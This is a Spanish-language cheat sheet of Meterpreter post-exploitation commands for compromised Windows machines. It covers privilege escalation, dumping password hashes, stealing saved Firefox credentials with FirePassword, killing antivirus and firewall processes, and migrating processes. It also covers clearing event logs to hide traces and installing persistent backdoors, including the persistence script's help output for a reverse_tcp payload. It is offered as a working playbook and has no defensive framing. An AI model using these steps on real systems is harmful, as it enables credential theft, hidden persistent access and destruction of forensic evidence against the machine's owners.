Comandos Meterpreter (Utiles)
Comandos Meterpreter (Utiles)
Comandos Meterpreter (Utiles)
run get_env -> Sirve para obteenr mas informacion del sistema que se infecto
getpid -> Sirve para saber que numero e poceso estamos ocupando
getuid -> Sirve para saber que privilegios tenemos en el sistema
getsystem -> Srive para elevar los privilegios
RUN -> sirve para correr scripts en meterpreter
run checkvm -> Sirve para saber si el equipo atacado es virtual o fisico
run get_application_list ->Sirve para ver la lista de programas instalados en el
pc
run scraper ->Nos permite acceder a los registros de windows y hashes de los usu
arios
run credcollect -> NOs permite obtener los hashes que almacena la base de datosd
le equipo objetivo
run enum_firefox -> Con este script se puede saer si el equipo tiene instalado f
irefox y si es asi
se descargan cookies, contraseas guardadas, historial de navegacin, etc.
Puede ser interesante extraer los datos los usuarios y contraseas all almacenados,
para esto se utiliza del programa FirePassword, el procedimiento es el siguient
e:
1. Descargar el programa (.exec)
2. Navegar desde Meterpreter al directorio donde se ha descargado o se encuentra
almacenado el programa con el uso de los comandos getlwd y lcd (estos comandos
permiten consultar el directorio actual (local) y cambiar la ruta de directorio
actual (local)
metsrv -> Otra forma de mantener el acceso a un objetivo, es por medio del estab
lecimiento de una puerta trasera, es posible definir una puerta trasera por medi
o del uso de la extensin metsvc de meterpreter, de esta forma se puede acceder po
steriormente al cliente sin necesidad de esperar nuevamente a que la maquina com
prometida establezca la conexin.
Una vez obtenida la sesin meterpreter es necesario buscar el proceso explorer, (e
n donde se intentar establecer la puerta trasera) aunque no necesariamente tiene
que ser este proceso en particular ya que se puede ejecutar el comando sobre cua
lquier identificador de proceso valido, se indica el proceso explorer ya que es un
o de los procesos mas importantes del sistema operativo:
meterpreter > ps
Process list============PID Name Arch Session User Path
- - - - 0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
476 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
.
meterpreter > migrate 244
[*] Migrating to 244
[*] Migration completed successfully.
4. Ahora ejecutar el comando shell para abrir una consola en el sistema remoto y
ejecutar el programa FirePassword en la maquina remota, con esto, el programa d
ar un listado de las rutas de navegacin empleadas y sus correspondientes credencia
les en texto plano (en el caso de que se encuentren almacenadas en el navegador)
.
winenum -> Se trata de un script que retorna toda la informacin posible sobre el
sistema objetivo, mezclando algunos de los scripts anteriormente mencionado
prefetchtool -> Permite obtener informacin sobre los programas que han sido frecu
entemente utilizados en el sistema comprometido, reportando las fechas de acceso
y creacin de cada uno de los programas encontrados, este script se vale de un ej
ecutable que debe estar incluido en el framework, en el caso de que no se encuen
tre, se intentar descargar de internet automticamente, por lo tanto para uso es ne
cesario tener conexin a internet(si se cuenta con el fichero prefetch.exe en el d
irectorio de metasploit) este fichero es instalado en el directorio <msf_install
_directory>/data/prefetch.exe
getcountermeasure -> Este script permite obtener informacin sobre los sistemas de
seguridad implementados en el objetivo, tales como AV y reglas de Firewall, y s
i es posible intenta matar el proceso.
clearev ->Se trata de una utilidad muy interesante que permite eliminar todos lo
s log registrados en los ficheros de eventos de la maquina comprometida, de esta
forma es posible ocultar las trazas de las acciones llevadas a cabo y que muy p
robablemente han quedado monitorizadas.
En un sistema basado en Windows, la herramienta para ver los log se encuentra ub
icada en Configuracin Herramientas Administrativas Event Viewer
persistence ->Una vez explotado un sistema, una puerta persistente que nos permi
ta conectarnos en cualquier momento a nuestro objetivo sin necesidad de explotar
lo nuevamente es algo deseable, para realizar esta tarea existen algunas otras f
ormas que implican la modificacin del registro de windows de forma manual, en est
e caso vamos a hacer uso de uno de los payloads que existen en una sesin meterpre
ter para instalar el servicio.
Nota: No especificamos ningn valor para autenticacin, lo que significa que cualqui
er usuario en la maquina remota, eventualmente intentara realizar una conexin a l
a puerta trasera, esto puede ser un riesgo de seguridad alto, por lo tanto se re
comienda tener precaucin y limpiar cualquier registro (huella) una vez se ha term
inado de realizar las tareas correspondientes.
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.OPTIONS:A Automatically start a matching multi/handler to connect to the agent
-L <opt> Location in target host where to write payload to, if none %TEMP% will
be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots